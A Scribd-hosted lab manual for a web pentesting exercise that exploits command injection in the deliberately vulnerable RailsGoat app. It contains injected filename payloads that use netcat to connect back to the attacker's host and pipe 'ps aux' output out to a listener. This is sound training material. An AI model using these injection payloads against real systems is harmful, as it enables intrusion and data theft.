Scribd Logo
Upload

Welcome to Scribd!

  • Lab Manual - Command Injection III

    Uploaded by

    huynhphuc112
    48 views16 pages
    This document outlines steps to exploit a command injection vulnerability in a web application called RailsGoat running on port 3000 of a target machine at IP 192.250.158.3. The steps include using Burp Suite to intercept an upload request, modifying the request to inject commands that start a netcat listener, and using that listener to obtain a shell on the target system and run commands like ps aux.

    Original Description:

    Lab Manual_ Command Injection III

    Original Title

    Lab Manual_ Command Injection III

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document outlines steps to exploit a command injection vulnerability in a web application called RailsGoat running on port 3000 of a target machine at IP 192.250.158.3. The steps include using Burp Suite to intercept an upload request, modifying the request to inject commands that start a netcat listener, and using that listener to obtain a shell on the target system and run commands like ps aux.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    48 views16 pages

    Lab Manual - Command Injection III

    Uploaded by

    huynhphuc112
    This document outlines steps to exploit a command injection vulnerability in a web application called RailsGoat running on port 3000 of a target machine at IP 192.250.158.3. The steps include using Burp Suite to intercept an upload request, modifying the request to inject commands that start a netcat listener, and using that listener to obtain a shell on the target system and run commands like ps aux.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 16

    Name Command Injection III

    URL https://attackdefense.com/challengedetails?cid=1907

    Type Webapp Pentesting Basics

    Important Note: This document illustrates all the important steps required to complete this lab.
    This is by no means a comprehensive step-by-step solution for this exercise. This is only
    provided as a reference to various commands needed to complete this exercise and for your
    further research on this topic. Also, note that the IP addresses and domain names might be
    different in your lab.

    Step 1:​ Determining the IP address of the target machine.

    Command:​ ifconfig
    The IP address of the host machine is 192.250.158.2. Therefore, the target machine will have IP
    address 192.250.158.3

    Step 2:​ Scan the target machine using nmap.

    Command:​ nmap 192.250.158.3

    We have discovered that port 3000 is open on the target machine.

    Step 3:​ Interacting the application available on port 3000 of the target machine.

    Open the following URL in firefox:

    URL:​ http://192.250.158.3:3000
    RailsGoat is hosted on the target machine.

    Step 4: ​Click on “Tutorial Credentials” button on the top header to view the login credentials.
    Click on “I understand” button and get the credentials:

    Login using the following credentials:


    Email:​ admin@metacorp.com
    Password:​ admin1234

    After Login:
    Step 5: ​Navigate to “BENEFIT FORMS” option:

    Step 6: ​Click on the Browse button and select the README file from Desktop
    Step 7:​ Configure Firefox to use Burp Suite. Click on the FoxyProxy plugin icon on the top-right
    of the browser and select "Burp Suite".

    Step 8: ​Start Burp Suite, Navigate to Web Application Analysis Menu and select "burpsuite".
    Click Next
    Click on Start Burp

    Step 9: ​Click on Start Upload button to upload the selected README file. The request will be
    intercepted by Burp Suite.

    The intercepted request will appear in the Proxy Tab of burp suite.
    Step 10: ​Send the intercepted request to Repeater
    Step 11: ​Start a netcat listener on the host machine.

    Command:​ nc -lvp 4444

    Step 12: ​In the repeater tab of Burp Suite, Change the value of "benefits[backup]" parameter to
    "true" and inject the command injection payload in the filename parameter.

    Modify the following highlighted payload:


    Due to command injection vulnerability, the content after ";" i.e "nc 192.250.158.2 4444" will be
    treated as another command and it will result in connection being received on the netcat
    listener.

    Click on the "Send" button to send the request.

    A connection will be received on the netcat listener.

    There exists a command injection vulnerability.

    Step 13: ​Start the netcat listener with the keep-alive option (-k). The Keep-alive option will allow
    multiple connections to be made to the same netcat listener.

    Command:​ nc -klvp 4444


    Step 14: ​Execute a command and pipe it's output to the netcat connection. Modify the filename
    parameter value in the request (in Repeater tab).

    Command: ​nc -w 1 192.250.158.2 4444

    The -w option will make the connection to time out after 1 second.

    Send the above request:


    The output of the command will be displayed on the netcat listener.

    Step 15: ​Modify the command in the Repeater window to list the processes running on the
    target machine.

    Command: ​ps aux | nc -w 1 192.250.158.2 4444


    Click on the send button to send the request.

    The processes running on the target machine will be listed on the netcat listener.

    References:

    1. OWASP A1 Injection
    (​https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/Top_10-2017_A1-Inject
    ion​)
    2. OWASP Top 10 (​https://owasp.org/www-project-top-ten/​)
    3. RailsGoat (​https://railsgoat.cktricky.com/​)

    You might also like